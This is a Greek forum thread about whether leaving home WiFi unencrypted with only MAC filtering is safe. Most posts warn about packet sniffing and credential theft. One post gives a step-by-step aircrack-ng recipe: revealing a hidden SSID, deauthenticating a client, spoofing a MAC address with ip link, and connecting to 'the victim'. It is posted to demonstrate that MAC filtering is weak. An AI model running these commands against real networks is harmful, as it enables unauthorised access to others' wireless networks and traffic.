Προς το περιεχόμενο

Προτεινόμενες αναρτήσεις

Δημοσ.

Δεν είναι μόνο «όσοι δεν έχουν σύνδεση» που συνδέονται σε WiFi άλλων, υπάρχουν και άτομα με κακόβουλες προθέσεις και κάποιοι που απλά θέλουν να κάνουν την πλάκα τους γιατί το να είσαι σε δίκτυο άλλου δε σημαίνει ότι απλά μπαίνεις στο Internet χρησιμοποιώντας τη γραμμή του, μπορείς να κάνεις πολύ περισσότερα. Μακάρι αν συμβεί κάτι τέτοιο να το συνειδητοποίησες αμέσως, αλλά αξίζει το ρίσκο; Αν, για παράδειγμα, έχεις παρατημένο το κινητό σου ενώ είναι συνδεδεμένο στο WiFi και κάποιος συνδεθεί κάνοντας spoof τη MAC address του, θα το καταλάβεις εσύ που θα είσαι σε κάποια άλλη συσκευή του δικτύου; Θα μου πεις «τι πιθανότητες έχει να γίνει αυτό;» αλλά δεν είναι σωστός αυτός ο τρόπος σκέψης.

• Like 1
  • Απαντ. 37
  • Δημ.
  • Τελ. απάντηση

Συχνή συμμετοχή στο θέμα

Συχνή συμμετοχή στο θέμα

Δημοσ.

Αν το δίκτυο είναι unencrypted, τότε θέτεις άμεσα θέμα ασφαλείας για όλα τα δεδομένα που θα μεταφέρονται ασύρματα σε unsecured συνδέσεις, που δεν έχουν point-to-point encryption.

Ο επίδοξος κλέφτης πανεύκολα θα μπορεί να διαβάσει κωδικούς, user names, και ότι άλλο μπορείς να φανταστείς.

Εφόσον αυτό που κάνεις το θές ως μόνιμη λύση, το ρίσκο που υπάρχει σε βάθος χρόνου δεν αξίζει τα όποια οφέλη πιστεύεις ότι έχεις.

Αν η ταχύτητά σου γονατίζει τόσο πολύ από το encryption, ίσως να ήταν φρονιμότερο να αγοράσεις κάποιο καλύτερο ρούτερ, με γρηγορότερο επεξεργαστή.

Δημοσ.

Αν το δίκτυο είναι unencrypted, τότε θέτεις άμεσα θέμα ασφαλείας για όλα τα δεδομένα που θα μεταφέρονται ασύρματα σε unsecured συνδέσεις, που δεν έχουν point-to-point encryption.

Ο επίδοξος κλέφτης πανεύκολα θα μπορεί να διαβάσει κωδικούς, user names, και ότι άλλο μπορείς να φανταστείς.

Αν η ταχύτητά σου γονατίζει τόσο πολύ από το encryption, ίσως να ήταν φρονιμότερο να αγοράσεις κάποιο καλύτερο ρούτερ, με γρηγορότερο επεξεργαστή.

1) ουτε CSI, αν μπορει να κανει κατι τετοιο, να διαβασει τα σκορπια πακετα στον αερα και να τα αρχειοθετησει, σαν τις ταινιες του ματριξ που τρεχουν οι κωδικες σε μια οθονη, συγνωμη θα ειμαι η αποθεωση της γκαντεμιας (για ενα τιποτα) αφενός κ αφετερου αυτος χαραμιζει το ταλεντο του. Συγνωμη σε λιγο θ αρχισω να φοβαμαι και το WPA2. Μη το τραβαμε, οκ σε θεμα ασφαλειας ειναι λιγο

2)ποια ρουτερακια ασχολουντε με τον εσωτερικο τους επεξεργαστη κ για home file sharing. ειναι το δευτερο ρουτερακι που αλλαζω μεσα σε 10 μερες, μου το συστησαν ως καλο, και ειναι καλο. τι αλλο θα μπορουσε ας πουμε

Δημοσ.

Η ασφάλεια των δεδομένων σου είναι δική σου υπόθεση, δεν θα επιμείνω σε κάτι για το οποίο έχεις αποφασίσει να υποβαθμίσεις τη σοβαρότητά του.

Εφόσον κάνεις διαμοιρασμό μεγάλων αρχείων και streaming HD υλικού, θέλει λίγο περισσότερη προσοχή στην επιλογή του ρούτερ. Δεν ξέρω ποιό έχεις, δεν μας είπες, αλλά εφόσον γονατίζει από το encryption, εκ του αποτελέσματος καταλαβαίνεις ότι υπάρχουν καλύτερες επιλογές.

• Like 1
Δημοσ.

1) ουτε CSI, αν μπορει να κανει κατι τετοιο, να διαβασει τα σκορπια πακετα στον αερα και να τα αρχειοθετησει, σαν τις ταινιες του ματριξ που τρεχουν οι κωδικες σε μια οθονη, συγνωμη θα ειμαι η αποθεωση της γκαντεμιας (για ενα τιποτα) αφενός κ αφετερου αυτος χαραμιζει το ταλεντο του. Συγνωμη σε λιγο θ αρχισω να φοβαμαι και το WPA2. Μη το τραβαμε, οκ σε θεμα ασφαλειας ειναι λιγο

Το packet sniffing δεν είναι κάτι δύσκολο, δε χρειάζεται να έχει «ταλέντο» αυτός που το κάνει. Κωδικοί και cookies από sites που δεν χρησιμοποιούν https βρίσκονται σχετικά εύκολα από κάποιον με γνώση (τόσο εύκολα όσο ένα extension στον browser, για παράδειγμα, όπως το Firesheep που «έκλεβε» cookies όσων είχαν συνδεθεί στο Facebook χωρίς https, πριν γίνει υποχρεωτικό δηλαδή). Σε site που δεν κάνουν encrypt ούτε τον κωδικό κατά τη σύνδεση, θα μπορούσε να βρει κάποιος τον κωδικό σε plain-text όταν έκανες login. Αν εσύ θες να πιστεύεις ότι αυτά γίνονται μόνο στις ταινίες, κάν' το. Εμείς σε προειδοποιήσαμε.

Δημοσ.

Η ασφάλεια των δεδομένων σου είναι δική σου υπόθεση, δεν θα επιμείνω σε κάτι για το οποίο έχεις αποφασίσει να υποβαθμίσεις τη σοβαρότητά του.

Εφόσον κάνεις διαμοιρασμό μεγάλων αρχείων και streaming HD υλικού, θέλει λίγο περισσότερη προσοχή στην επιλογή του ρούτερ. Δεν ξέρω ποιό έχεις, δεν μας είπες, αλλά εφόσον γονατίζει από το encryption, εκ του αποτελέσματος καταλαβαίνεις ότι υπάρχουν καλύτερες επιλογές.

Δεν εχω δεδομενα υψιστης ασφαλειας στο δικτυο, δεν κανω αγορες με προπληρωμενες/πιστωτικες, δεν εχω κατι να φοβαμαι γυρω μου κ εντος κ οταν το ψαχνεις πολυ την πατας (περισσοτερο ασχημα). Το δικτυο εχει ασφαλεια (MAC Filtering), Credentials κ.α με τα σεναρια που παιζουμε σχεδον το χα ξεχασει. Μεχρι εδω αυτο το θεμα, το ρουτερακι το αναφερω στο πρωτο Post

Δημοσ.

STEP 0: Using aircrack-ng to find the SSID

# airmon-ng start wlan0
# airodump-ng mon0
# airodump-ng -c <channel_number> --bssid <access_point_mac>  mon0
# aireplay-ng -0 30 -a  <access_point_mac> -c <client_mac> mon0

Finding SSID... [DONE!]

STEP 1A: Changing MAC at linux

# ip link set dev <interface> down
# ip link set dev <interface> address 00:00:00:00:00:01
# ip link set dev <interface> up

STEP 1B: Even more fun.. Changing the router's MAC

gQhTMgw.png?1

OPTIONAL: Verify that router's MAC has been modified

oZ9JVxU.png?1

Changing MAC... [DONE!]

STEP 2: You can now connect to the victim (using a WiFi adaptor or a router in Client mode)

:-)

• Like 1
Δημοσ.

Κ ολα αυτά τα γνωρίζει κ η κουτσή Μαρία σ όλο το τετράγωνο της συνοικίας . Καλή πλοήγηση Μαρία . Πες μας και πως σπας τον κωδικό του ρουτερ κ το 128bit encryption των Windows file sharing γιατι αν μπεις στο Ίντερνετ με το ρουτερ μου αν παραβείς την εντολή δεν υπάρχει γυρισμός σ αυτό το κόσμο. Θα μπουκώσει το Dslam, θα σηκωθεί ο μακαρίτης απ το μνήμα Μαρία. Θα με πας φυλακή. Άραγε ποσό bandwidth θα κερδίσεις με μια ντάμα Wifi δικτύου θα πονέσεις πολύ το Victim σου Μαρία; Θα κατεβάσεις κ τορρεντς ; Θα κόψεις το σταθερό στο σπίτι σου; Όχι Μαρία μη μου το κανεις αυτό, που πας Μαρία #parody

Ο μπάρμπας απέναντι το εχει ορθάνοιχτο . Πολλές φορές με το παλιό μόντεμ που δεν έπιανα στο μπαλκόνι εμπενα απ αυτόν . Είχε και μια Samsung τηλεόραση συνδεμένη στο δίκτυο . Όποτε εμπενα YouTube μου έβγαζε επιλογή αναπαραγωγής στη τηλεόραση :D αν ειναι έτσι δεν έχω πρόβλημα να μπει κάποιος περιστασιακά #meanwhile . Την μπροστινή πλευρά την καλύπτει ο μπάρμπας την πίσω εγώ σ όποιον εχει τ @@ μπιπ συγνώμη

Δημοσ.

Σου ευχομαι... η Μαρια εκτος απο κουτση να ειναι και τυφλη, ωστε να μην μπορει να διαβασει πληροφοριες απο το Internet.

Κατα τ'αλλα... ειμαι περιεργος να δω αν καποιος αλλαξει τη MAC του router του και βαλει αυτη του δικου σου router, πως ακριβως θα καταλαβει το τηλεφωνο σου π.χ... ποιος ειναι ποιος, ωστε να μην συνδεθει στο "πλαστό" router... Το ιδιο και αν χρησιμοποιει USB που το εχει κανει Access Point.

Κανε μετα login σε κανα insomnia που δεν εχει https και η κλοπη των credentials(?) γινεται αστεια υποθεση.

Οσο για τα σεναρια CSI και το να διαβασει καποιος τα πακετα στον αερα και να τα αρχειοθετησει... φυσικα και γινεται. Ετσι...

Nr5R8uF.jpg?1

Δημοσ.

Φίλε θα σου πω κάτι που έτυχε σ' ένα γνωστό μου. Με περίπου ίδιο τρόπο έσπασε το wifi του κάποιος γείτονας και στην αρχή απλά έκλεβε Internet . Και ο γνωστός μου τα ίδια έλεγε "έλα μωρέ τι θα κάνει" . Λοιπόν σε πληροφορώ ότι ο γείτονας κατέβασε υλικό παιδικής πορνογραφίας. Κάποια στιγμή η αστυνομία μπήκε στο σπίτι του αφελή γνωστού μου, το έκανε άνω κάτω και κατάσχεσε τον σκληρό δίσκο του υπολογιστή. Φυσικά συνελήφθη και ο ίδιος. Από τότε περιμένει να γίνει το δικαστήριο και κατηγορείται για κακουργηματική κατοχή υλικού παιδικής πορνογραφίας. 

Αν δε σε νοιάζει μπορείς ελεύθερα να το αφήσεις και ανοιχτό....

Δημοσ.

Φίλε θα σου πω κάτι που έτυχε σ' ένα γνωστό μου. Με περίπου ίδιο τρόπο έσπασε το wifi του κάποιος γείτονας και στην αρχή απλά έκλεβε Internet . Και ο γνωστός μου τα ίδια έλεγε "έλα μωρέ τι θα κάνει" . Λοιπόν σε πληροφορώ ότι ο γείτονας κατέβασε υλικό παιδικής πορνογραφίας. Κάποια στιγμή η αστυνομία μπήκε στο σπίτι του αφελή γνωστού μου, το έκανε άνω κάτω και κατάσχεσε τον σκληρό δίσκο του υπολογιστή. Φυσικά συνελήφθη και ο ίδιος. Από τότε περιμένει να γίνει το δικαστήριο και κατηγορείται για κακουργηματική κατοχή υλικού παιδικής πορνογραφίας.

Τον έχουν μουτζωσει

Σου ευχομαι... η Μαρια εκτος απο κουτση να ειναι και τυφλη, ωστε να μην μπορει να διαβασει πληροφοριες απο το Internet.

Κατα τ'αλλα... ειμαι περιεργος να δω αν καποιος αλλαξει τη MAC του router του και βαλει αυτη του δικου σου router, πως ακριβως θα καταλαβει το τηλεφωνο σου π.χ... ποιος ειναι ποιος, ωστε να μην συνδεθει στο "πλαστό" router... Το ιδιο και αν χρησιμοποιει USB που το εχει κανει Access Point.

Κανε μετα login σε κανα insomnia που δεν εχει https και η κλοπη των credentials(?) γινεται αστεια υποθεση.

Οσο για τα σεναρια CSI και το να διαβασει καποιος τα πακετα στον αερα και να τα αρχειοθετησει... φυσικα και γινεται. Ετσι...

Nr5R8uF.jpg?1

Οκ

Δημοσ.

οκ, σορρυ αλλά αυτη την ιστορία δεν την πιστεύω.

Δεν ξέρω αλλά το ενστιγκτο μου λέει ότι είναι urban legend.

Σα το "σου ρίχνουν κάτι στο ποτό που έλεγε κι η γιαγιά μου".

Το ξαναματακλείδωσα όμως για όλα τα προηγούμενα, αλλά νταξ αυτό βρωμάει ιστορία fake.

• Like 1
Δημοσ.

Υπήρξε περίπτωση (έγινε αναφορά από πολλά ΜΜΕ) πριν 2 χρόνια όπου είχε αντίστοιχο πρόβλημα μια νέα αστυνομικός.

Αρχικά έμπλεξε άσχημα, αλλά για καλή της τύχη ο πραγματικός ένοχος πιάστηκε λίγο αργότερα καθώς έκανε το λάθος να χρησιμοποιήσει πιστωτική κάρτα για αγορές, χρησιμοποιώντας πάλι το ασύρματο δίκτυο της κοπέλας.

Δημοσ.

Εγω θαθελα να μπει καποιος και να κατεβασει καμια παιδικη πορνογραφια απο το wifi του..... τι τσιγαρα καπνιζεις ειπαμε?

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε για να σχολιάσετε

Πρέπει να είστε μέλος για να αφήσετε σχόλιο

Δημιουργία λογαριασμού

Εγγραφείτε με νέο λογαριασμό στην κοινότητα μας. Είναι πανεύκολο!

Δημιουργία νέου λογαριασμού

Σύνδεση

Έχετε ήδη λογαριασμό; Συνδεθείτε εδώ.

Συνδεθείτε τώρα

• Δημιουργία νέου...